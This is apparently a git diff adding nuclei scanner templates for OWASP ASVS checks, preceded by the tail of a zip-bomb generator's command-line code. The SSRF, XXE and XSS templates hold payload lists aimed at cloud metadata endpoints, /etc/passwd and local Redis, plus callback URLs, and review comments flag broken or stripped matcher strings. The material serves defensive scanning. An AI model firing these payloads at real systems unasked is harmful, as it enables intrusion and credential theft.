> bomb.zip + +The --num-files option and either the --compressed-size or +--max-uncompressed-size options are required. + + --algorithm=ALG ALG can be "deflate" (default) or "bzip2" + --alphabet=CHARS alphabet for constructing filenames + --compressed-size=N compressed size of the kernel + --extra=HHHH use extra-field quoting with the type tag 0xHHHH + --max-uncompressed-size=N maximum uncompressed size of the kernel + --mode=MODE "no_overlap", "full_overlap", or "quoted_overlap" (default) + --num-files=N number of files to contain, not counting template files + --template=ZIP zip file containing other files to store in the zip bomb + --zip64 enable Zip64 extensions\ +""".format(program_name=sys.argv[0]), file=file) + +def main(): + opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["algorithm=", "alphabet=", "compressed-size=", "extra=", "help", "max-uncompressed-size=", "mode=", "num-files=", "template=", "zip64"]) + assert not args, args + global FILENAME_ALPHABET + mode = write_zip_quoted_overlap + compression_method = COMPRESSION_METHOD_DEFLATE + compressed_size = None + max_uncompressed_size = None + extra_tag = None + template_filenames = [] + zip64 = False + for o, a in opts: + if o == "--algorithm": + compression_method = { + "bzip2": COMPRESSION_METHOD_BZIP2, + "deflate": COMPRESSION_METHOD_DEFLATE, + }[a] + elif o == "--alphabet": + assert len(set(sorted(a))) == len(a), a + FILENAME_ALPHABET = bytes(a, "utf-8") + elif o == "--compressed-size": + compressed_size = int(a) + elif o == "--extra": + # This is an experimental feature that quotes as many files as + # possible inside the Extra Field of local file headers, rather than + # quoting using DEFLATE non-compressed blocks. The argument is a + # 16-bit hexadecimal tag ID. It should be possible to use any tag ID + # that's unallocated in APPNOTE.TXT 4.5.2. 
+ extra_tag = int(a, 16) + elif o == "--max-uncompressed-size": + max_uncompressed_size = int(a) + elif o == "--mode": + mode = { + "no_overlap": write_zip_no_overlap, + "full_overlap": write_zip_full_overlap, + "quoted_overlap": write_zip_quoted_overlap, + }[a] + elif o == "--num-files": + num_files = int(a) + elif o == "--template": + template_filenames.append(a) + elif o == "--zip64": + zip64 = True + elif o in ("-h", "--help"): + usage() + sys.exit(1) + + if extra_tag is not None and mode != write_zip_quoted_overlap: + print("--extra only makes sense with --mode=quoted_overlap", file=sys.stderr) + sys.exit(1) + + template = [] + for filename in template_filenames: + template.extend(load_template(filename)) + + mode(sys.stdout.buffer, num_files, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size, compression_method=compression_method, zip64=zip64, template=template, extra_tag=extra_tag) + +if __name__ == "__main__": + main() diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml new file mode 100644 index 0000000..2d92495 --- /dev/null +++ b/templates/dast/12.3.3.yaml 
@@ -0,0 +1,47 @@ +id: ASVS-4-0-3-V12-3-3 + +info: + name: ASVS 12.3.3 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918, CWE-98 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ + + tags: asvs,12.3.3 + + description: | + Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure or execution of remote files via Remote File Inclusion (RFI) or Server-side Request Forgery (SSRF) attacks. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + rfi: + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + - "https://{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" + + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml new file mode 100644 index 0000000..48d7186 --- /dev/null +++ b/templates/dast/5.2.6.yaml 
@@ -0,0 +1,106 @@ +id: ASVS-4-0-3-V5-2-6 + +info: + name: ASVS 5.2.6 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + tags: asvs,5.2.6 + description: | + Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{FQDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{FQDN}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'http://{{RDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{RDN}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + fuzz: + - "{{ssrf}}" + + - part: body + mode: single + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body 
+ regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml new file mode 100644 index 0000000..a8d0005 --- /dev/null +++ b/templates/dast/5.3.3.2.yaml @@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V5-3-3-2 + +info: + name: ASVS 5.3.3.2 (Reflected XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml +tags: asvs,5.3.3 +description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "'\"><{{first}}>" + - "'><{{first}}>" + - "\"><{{first}}>" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" 
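Review bot: in `templates/dast/5.3.3.2.yaml` the `tags:` and `description:` keys sit at the top level instead of indented under `info:` (compare every other template in this patch), so `info.tags` is empty, `-tags asvs` / `-tags 5.3.3` selection will not pick this template up, and the template-validate workflow will not treat it like the others; indent both keys by two spaces under `info`. The `matchers-condition: and` combination of the raw `"{{reflection}}"` body match and the `text/html` header check is a sound reflection test, but it only detects an unencoded reflection of `<{{first}}>`; reflection into a script string or an attribute value without `<` is not covered, which is acceptable for a 5.3.3 smoke test if the description says so.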
diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml new file mode 100644 index 0000000..13f7fe5 --- /dev/null +++ b/templates/dast/5.5.2.yaml @@ -0,0 +1,62 @@ +id: ASVS-4-0-3-V5-5-2 + +info: + name: ASVS 5.5.2 Check + author: AmirHossein Raeisi + severity: High + classification: + cwe-id: CWE-611 + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + tags: asvs,5.5.2 + description: | + Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' + + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/templates/headless/5.3.3.1.yaml b/templates/headless/5.3.3.1.yaml new file mode 100644 index 0000000..f3fb1a5 --- /dev/null +++ b/templates/headless/5.3.3.1.yaml 
@@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml index ce7ab3e..7f941cb 100644 --- a/templates/workflows/14.3.2.yaml +++ b/templates/workflows/14.3.2.yaml 
@@ -13,28 +13,28 @@ info: Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. workflows: - - template: misconfiguration/symfony-debug.yaml - - template: exposures/logs/rails-debug-mode.yaml - - template: misconfiguration/debug/bottle-debug.yaml - - template: misconfiguration/debug/ampache-debug.yaml - - template: misconfiguration/laravel-debug-enabled.yaml - - template: misconfiguration/laravel-debug-infoleak.yaml - - template: misconfiguration/laravel-debug-error.yaml - - template: misconfiguration/aspx-debug-mode.yaml - - template: exposures/logs/jboss-seam-debug-page.yaml - - template: misconfiguration/struts-ognl-console.yaml - - template: exposures/logs/struts-problem-report.yaml - - template: misconfiguration/sitecore-debug-page.yaml - - template: exposures/logs/django-debug-exposure.yaml - - template: misconfiguration/rekognition-image-validation.yaml - - template: misconfiguration/browserless-debugger.yaml - - template: exposures/logs/struts-debug-mode.yaml - - template: misconfiguration/django-debug-detect.yaml - - template: misconfiguration/airflow/airflow-debug.yaml - - template: misconfiguration/php-debugbar-exposure.yaml - - template: misconfiguration/wamp-xdebug-detect.yaml - - template: misconfiguration/typo3-debug-mode.yaml - - template: exposures/logs/pyramid-debug-toolbar.yaml - - template: misconfiguration/php-errors.yaml - - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml - - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file + - template: workflows/misconfiguration/symfony-debug.yaml + - template: workflows/exposures/logs/rails-debug-mode.yaml + - template: workflows/misconfiguration/debug/bottle-debug.yaml + - template: workflows/misconfiguration/debug/ampache-debug.yaml + - template: workflows/misconfiguration/laravel-debug-enabled.yaml + - template: 
workflows/misconfiguration/laravel-debug-infoleak.yaml + - template: workflows/misconfiguration/laravel-debug-error.yaml + - template: workflows/misconfiguration/aspx-debug-mode.yaml + - template: workflows/exposures/logs/jboss-seam-debug-page.yaml + - template: workflows/misconfiguration/struts-ognl-console.yaml + - template: workflows/exposures/logs/struts-problem-report.yaml + - template: workflows/misconfiguration/sitecore-debug-page.yaml + - template: workflows/exposures/logs/django-debug-exposure.yaml + - template: workflows/misconfiguration/rekognition-image-validation.yaml + - template: workflows/misconfiguration/browserless-debugger.yaml + - template: workflows/exposures/logs/struts-debug-mode.yaml + - template: workflows/misconfiguration/django-debug-detect.yaml + - template: workflows/misconfiguration/airflow/airflow-debug.yaml + - template: workflows/misconfiguration/php-debugbar-exposure.yaml + - template: workflows/misconfiguration/wamp-xdebug-detect.yaml + - template: workflows/misconfiguration/typo3-debug-mode.yaml + - template: workflows/exposures/logs/pyramid-debug-toolbar.yaml + - template: workflows/misconfiguration/php-errors.yaml + - template: workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: workflows/technologies/werkzeug-debugger-detect.yaml diff --git a/templates/workflows/exposures/logs/django-debug-exposure.yaml b/templates/workflows/exposures/logs/django-debug-exposure.yaml new file mode 100644 index 0000000..31c6aaa --- /dev/null +++ b/templates/workflows/exposures/logs/django-debug-exposure.yaml 
@@ -0,0 +1,33 @@ +id: django-debug-exposure + +info: + name: Django Debug Exposure + author: geeknik + severity: high + description: Django debug mode enabled exposes internal information. + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 + metadata: + max-request: 1 + tags: django,exposure + +http: + - method: POST + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" + condition: and +# digest: 4a0a00473045022075f8eb23f058287e94f409e156c595d9a3160eeca81f66a83d61be4144301dc7022100a96b53e8b7688c50241e531c5e45dac6fb3788d27fce1f21ac315b1279ddbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml new file mode 100644 index 0000000..261c65f --- /dev/null +++ b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml @@ -0,0 +1,30 @@ +id: jboss-seam-debug-page + +info: + name: Jboss Seam Debug Page Enabled + author: dhiyaneshDK + severity: medium + description: Jboss Seam Debug Page was exposed. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml + metadata: + max-request: 1 + tags: jboss,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/debug.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "SeamDebugPage" + - "org.jboss.seam" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e8411b45c22ca433e5f3bd5fe956f5b345fc7057cfd50ba2e94466da76bccc48022100d548feaa4f8967210c5093ab640433f3dcbc610e1afe2e12b9bf2232fa240129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml new file mode 100644 index 0000000..8f82ce0 --- /dev/null +++ b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml @@ -0,0 +1,31 @@ +id: pyramid-debug-toolbar + +info: + name: Pyramid Debug Toolbar + author: geeknik + severity: medium + description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. + reference: + - https://github.com/Pylons/pyramid_debugtoolbar + metadata: + max-request: 1 + tags: pyramid,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/_debug_toolbar/" + + matchers-condition: and + matchers: + - type: word + words: + - "Pyramid Debug Toolbar" + - "Pyramid DebugToolbar" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502203726e298675935a1a75fbcbe9ce8316c4ae6ef30822fb311a5004539662e1798022100bc0f0f98f4fcb801279da72e8eca3bf8eae9c211edcf6e89ad9bfc35f8708b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/rails-debug-mode.yaml b/templates/workflows/exposures/logs/rails-debug-mode.yaml new file mode 100644 index 0000000..7b30e36 --- /dev/null +++ b/templates/workflows/exposures/logs/rails-debug-mode.yaml @@ -0,0 +1,24 @@ +id: rails-debug-mode + +info: + name: Rails Debug Mode + author: pdteam + severity: medium + description: Rails debug mode is enabled. + metadata: + max-request: 1 + tags: debug,rails,exposure,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and +# digest: 4a0a00473045022032b4ac1b752bc49bad211b086747a6b513069249d0119c514d0c5bb4273ce0f3022100bb3cffbab5dc40220beeb5c9a33a8b54794e5ab5086e8ec6aacbe479ec7c94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
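Review bot: `pyramid-debug-toolbar.yaml` requires both spellings `Pyramid Debug Toolbar` and `Pyramid DebugToolbar` in the same response (`condition: and`); if the intent is "either spelling", this should be `or`, and if the toolbar index page really renders both, a one-line comment saying so will stop the next reader from changing it. In `rails-debug-mode.yaml` the `{{BaseURL}}/{{randstr}}` path deliberately provokes a routing error, which is what the `intrusive` tag signals; it has no status matcher, so add one for `404` (what Rails returns for an unknown route) to avoid matching copies of the exception text on unrelated pages.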
diff --git a/templates/workflows/exposures/logs/struts-debug-mode.yaml b/templates/workflows/exposures/logs/struts-debug-mode.yaml new file mode 100644 index 0000000..f0c8fb6 --- /dev/null +++ b/templates/workflows/exposures/logs/struts-debug-mode.yaml @@ -0,0 +1,23 @@ +id: struts-debug-mode + +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + description: Apache Struts debug mode is enabled. + metadata: + max-request: 1 + tags: logs,struts,apache,exposure,setup + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "" + - "" + condition: and +# digest: 4a0a00473045022100bf6dbd31ef92f8e1dc40fb686e16761845933696c79fb4bb1b2576a03644deb0022005dd1ca7689260b05edd0714b26365856dec3d802159866075540766f352e443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/struts-problem-report.yaml b/templates/workflows/exposures/logs/struts-problem-report.yaml new file mode 100644 index 0000000..2c1bfa9 --- /dev/null +++ b/templates/workflows/exposures/logs/struts-problem-report.yaml @@ -0,0 +1,29 @@ +id: struts-problem-report + +info: + name: Apache Struts Dev Mode - Detect + author: dhiyaneshDK + severity: low + description: Multiple Apache Struts applications were detected in dev-mode. + reference: + - https://www.exploit-db.com/ghdb/4278 + metadata: + max-request: 1 + tags: struts,debug,edb,exposure,apache + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Struts Problem Report' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022072b2375b4cd9dbf2bcce90d71c72e6c52718019b361ce71eea5f617c6a3904e1022100dc2851ed0fcc38ac40f189bfbaef67f1afbef38a0e43466dfdd3eb6005efd6a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
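Review bot: `struts-debug-mode.yaml` has two empty strings in its `words` list with `condition: and`; an empty needle is contained in every body, and there is no status matcher, so as committed this template fires on every host it is run against. The markers were presumably HTML or tag-library literals that were dropped in transit; restore them before merging, otherwise the check is pure noise. In `struts-problem-report.yaml` the description reads "Multiple Apache Struts applications were detected in dev-mode" for a single-target check; "Apache Struts devMode is enabled" states what one match means.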
diff --git a/templates/workflows/misconfiguration/airflow/airflow-debug.yaml b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000..8742106 --- /dev/null +++ b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml @@ -0,0 +1,31 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + description: Airflow Debug Trace enabled. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/aspx-debug-mode.yaml b/templates/workflows/misconfiguration/aspx-debug-mode.yaml new file mode 100644 index 0000000..4dd64d7 --- /dev/null +++ b/templates/workflows/misconfiguration/aspx-debug-mode.yaml @@ -0,0 +1,38 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: + - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + metadata: + max-request: 1 + tags: debug,misconfig + +http: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'OK' + part: body + + - type: word + words: + - 'Content-Length: 2' + part: header + +# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/browserless-debugger.yaml b/templates/workflows/misconfiguration/browserless-debugger.yaml new file mode 100644 index 0000000..f3ab2b6 --- /dev/null +++ b/templates/workflows/misconfiguration/browserless-debugger.yaml 
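Review bot: in `airflow-debug.yaml` the first word literal has been broken across several lines (an opening `"`, blank lines, `Ooops.`, blank lines, closing `"`); a double-quoted YAML scalar that spans lines folds the breaks, so the needle is no longer the single-line markup fragment it was meant to be, and with `condition: and` the matcher is unlikely ever to fire. Put the literal back on one line. In `aspx-debug-mode.yaml` the raw request declares `Content-Length: 2` but carries no body; confirm that nuclei sends the header exactly as written, because a server that honours the declared length will wait for two bytes that never arrive and the request will time out instead of returning the `OK` body the matchers expect.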
@@ -0,0 +1,33 @@ +id: browserless-debugger + +info: + name: Exposed Browserless debugger + author: ggranjus + severity: medium + description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files. + reference: + - https://docs.browserless.io/docs/docker.html#securing-your-instance + metadata: + max-request: 1 + shodan-query: http.title:"browserless debugger" + tags: browserless,unauth,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "browserless debugger" + - "Click the ► button to run your code." + condition: or + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/ampache-debug.yaml b/templates/workflows/misconfiguration/debug/ampache-debug.yaml new file mode 100644 index 0000000..864f52e --- /dev/null +++ b/templates/workflows/misconfiguration/debug/ampache-debug.yaml @@ -0,0 +1,34 @@ +id: ampache-debug + +info: + name: Ampache Debug Page + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"Ampache -- Debug Page" + tags: misconfig,ampache,debug + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/test.php?action=config' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ampache Debug" + + - type: status + status: + - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/templates/workflows/misconfiguration/debug/bottle-debug.yaml b/templates/workflows/misconfiguration/debug/bottle-debug.yaml new file mode 100644 index 0000000..efc4dd0 --- /dev/null +++ b/templates/workflows/misconfiguration/debug/bottle-debug.yaml @@ -0,0 +1,36 @@ +id: bottle-debug + +info: + name: Bottle debug mode enabled + author: viondexd + severity: info + reference: + - https://bottlepy.org/docs/dev/tutorial.html#debug-mode + metadata: + verified: true + max-request: 1 + shodan-query: html:"Sorry, the requested URL" + tags: bottle,exposure,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Sorry, the requested URL " + - " caused an error:" + condition: and + + - type: word + part: body + words: + - "'{{BaseURL}}'" + - "'{{BaseURL}}/'" + condition: or + +# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/django-debug-detect.yaml b/templates/workflows/misconfiguration/django-debug-detect.yaml new file mode 100644 index 0000000..0b0a84e --- /dev/null +++ b/templates/workflows/misconfiguration/django-debug-detect.yaml 
@@ -0,0 +1,29 @@ +id: django-debug + +info: + name: Django Debug Configuration Enabled + author: dhiyaneshDK,hackergautam + severity: medium + description: Django debug configuration is enabled, which allows an attacker to obtain system configuration information such as paths or settings. + metadata: + max-request: 1 + tags: django,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/NON_EXISTING_PATH/" + + matchers-condition: and + matchers: + - type: word + words: + - URLconf defined + - Page not found + - Django tried these URL patterns, in this order + condition: and + + - type: status + status: + - 404 +# digest: 4a0a0047304502204a5ac1486faa3be8702801b635c79e5a565724d1843641c69a5a09d012b23233022100a2ce507b92c7ffc804f071bc47c76185c97613307e1e15be73a224a45da5fa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-enabled.yaml b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml new file mode 100644 index 0000000..1b0a861 --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml @@ -0,0 +1,31 @@ +id: laravel-debug-enabled + +info: + name: Laravel Debug Enabled + author: notsoevilweasel + severity: medium + description: | + Laravel with APP_DEBUG set to true is prone to show verbose errors. + remediation: | + Disable Laravel's debug mode by setting APP_DEBUG to false. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/_ignition/health-check" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - can_execute_commands + + - type: status + status: + - 200 + +# digest: 4a0a00473045022021f5d4e0139f8896fd4f330b08e129cdf385a67aab51ba5516fafd4b4ff0335a022100d877024cf9f3def775870120ada78e34b730ef7acdf0c6b30f58fff4f9ec6549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
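Review bot: `django-debug-detect.yaml` declares `id: django-debug`, which does not match its filename; every other template in this patch keeps `id` and filename identical (`symfony-debug`, `typo3-debug-mode`, `php-errors`), and the workflow references files by path while nuclei's `-id` filter and output reference them by id, so keep the two aligned. In `laravel-debug-enabled.yaml` the description talks about verbose errors, but the check only confirms that `/_ignition/health-check` answers with `can_execute_commands`, i.e. that the Ignition debug page is reachable; describe what the template actually observes.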
